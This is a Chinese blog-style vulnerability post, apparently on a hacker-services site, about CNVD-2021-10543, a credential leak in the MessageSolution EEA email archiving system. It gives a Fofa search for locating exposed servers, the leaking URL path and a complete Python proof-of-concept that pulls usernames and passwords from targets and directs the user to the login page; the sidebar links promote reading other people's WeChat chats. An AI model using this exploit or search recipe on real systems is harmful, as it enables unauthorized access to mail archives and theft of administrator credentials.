找黑客平台

(CNVD-2021-10543)|MessageSolution 企业邮件归档管理系统 EEA 存...

访客4年前黑客文章993

0x01 漏洞说明

MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码。

0x02?影响版本

  • MessageSolution Enterprise Email Archiving (EEA)

0x03?漏洞复现

Fofa搜索标题:(注意:互联网的非授权利用属于违法行为)

1616388109_6058200de451706f28aaa.png!small?1616388110296

MessageSolution企业邮件归档管理系统首页为这样:1616389048_605823b81b91dae6697ed.png!small?1616389055602

访问URL查看泄漏的hash和web账号密码:

http://xxx.xxx.xxx/authenticationserverservlet/

1616389205_605824558594c07be7540.png!small?1616389205976

获取到账号、密码后即可访问url进行登录:

https://xxx.xxx.xxx.xxx/indexcommon.jsp

1616388970_6058236a382651adf84ae.png!small?1616388970881

脚本POC:

# CNVD-2021-10543
# MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞
# fofa: title="MessageSolution"

import requests
import time
import json
from bs4 import BeautifulSoup
# 忽略SSL证书校验提醒
requests.packages.urllib3.disable_warnings()

def title():
    print("+-------------------------------------------------+")
    print("+-----------    CNVD-2021-10543   ----------------+")
    print("+----------- MessageSolution信息泄漏 --------------+")
    print('+--------- Fofa: title="MessageSolution" ---------+')
    print("+--------  use: python3 CNVD-2021-10543.py -------+")
    print("+-------------------------------------------------+")

def target_url(url):
    target_url=url + "/authenticationserverservlet/"
    login_url=url + "/indexcommon.jsp"
    # verify=False 忽略SSL证书校验
    try:
        res=requests.get(url=target_url, verify=False,timeout=5)
        if "administrator" in res.text and res.status_code==200:
            print(f"[!] \033[31m目标系统: {url} 存在信息泄漏\033[0m")
            time.sleep(1)
            print("[!] \033[31m正在获取目标系统敏感信息.........\033[0m")
            bs_xml=BeautifulSoup(res.text,features="html.parser")
            user_names=bs_xml.findAll('username')
            passwords=bs_xml.findAll('password')
            i=1
            print(f"[!] \033[31m获取到目标系统信息:\033[0m")
            if i < len(user_names):
                for user_name,password  in user_names,passwords:
                    print(f"   用户名: {user_name.text}    密 码: {password.text}")
                    i=i+1
            else:
                print(f"   用户名: {user_names[0].text}
   密 码: {passwords[0].text}")
            print(f"\033[32m[0] 请访问: {login_url} 进行登录!")
        else:
            print(f"[0]  \033[32m目标系统: {url} 不存在信息泄\033[0m")
    except Exception as e:
        print(f"[!]  目标系统: {url} 出现意外错误:
 {e}")




if __name__=="__main__":
    title()
    url=str(input("[0] 请输入目标站点URL:
"))
    target_url(url)

0x04?修复建议

厂商暂未给出修复建议?。

建议用户将该系统放置在内网,不要暴露在互联网,同时禁止未授权访问相关文件?。


结束语

本文章仅用于交流学习,请勿使用该漏洞进行违法活动。

https://github.com/Henry4E36/CNVD-2021-10543

标签: (CNVD-2021-10543)|MessageSolution 企业邮件归档管理系统 EEA 存...
返回列表

上一篇:微信怎么防止别人看聊天记录(微信怎么防查聊天记录)

下一篇:怎么调取别人微信聊天记录

相关文章

[淘宝黑客怎么联系]打击黑客敲诈需要法律利剑 淘宝应有所动作

事情回看 据昨日中国广播网报导,非法黑客攻击服务器,通常是利用互联网技术的技术性系统漏洞。而对互联网技术上的另一个店家人群——电子商务经营人而言,对她们执行敲诈敲诈勒索的人,通常是利用电子商务平台的...

烤鱼是什么味道怎么样(烤鱼什么口味的最好吃

烤鱼是什么味道怎么样(烤鱼什么口味的最好吃

烤鱼是指通过热加工对鱼类进行烹饪的一种方法,现在提到“烤鱼”大多指“川味烤鱼”。 每次都想在外面吃烤鱼,你吃过多少种呢!让我们来细数一下! 香辣烤鱼 盐焗烤鱼 辣味烤鱼 什锦烤鱼 酱香烤鱼 香辣豆...

鲜榨果汁加盟连锁店利润如何?如何开一家鲜榨果汁加盟店?

鲜榨果汁加盟连锁店利润如何?如何开一家鲜榨果汁加盟店?

陪伴着人们糊口程度的提高以及餐饮市场的不绝成长,市面上徐徐呈现了浩瀚受消费者接待的美食以及饮品。就拿此刻的饮品行业来说,鲜榨果汁作为较量有代表性的饮品也迎来了很辽阔的成长空间,跟着各人开始注重康健的糊...

ps的蒙版工具有什么用,ps文字蒙版工具怎么用

利用蒙版及调色工具快速设计给美女换脸,简单粗暴,后期调色好大小及颜色即可,有兴趣的可以自己试试...

键盘黑客是什么意思(黑客指什么意思)

键盘黑客是什么意思(黑客指什么意思)

本文目录一览: 1、黑客总还不停的敲键盘,难道不用鼠标吗? 2、什么叫黑客解释一下 3、黑客是什么意思? 黑客总还不停的敲键盘,难道不用鼠标吗? 作为一个程序员本身也不是什么黑客,但对于网络...

学好应用Striker等于你也就会应用了17个网络黑客专业技

学好应用Striker等于你也就会应用了17个网络黑客专业技

Striker是一个让人抵触的信息内容和漏洞扫描器。只必须了解网站域名,就可以完成自动化技术信息收集和漏洞检测;针对初学者非常的合适!   作用 只应向Striker出示网站域名,它便会全...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.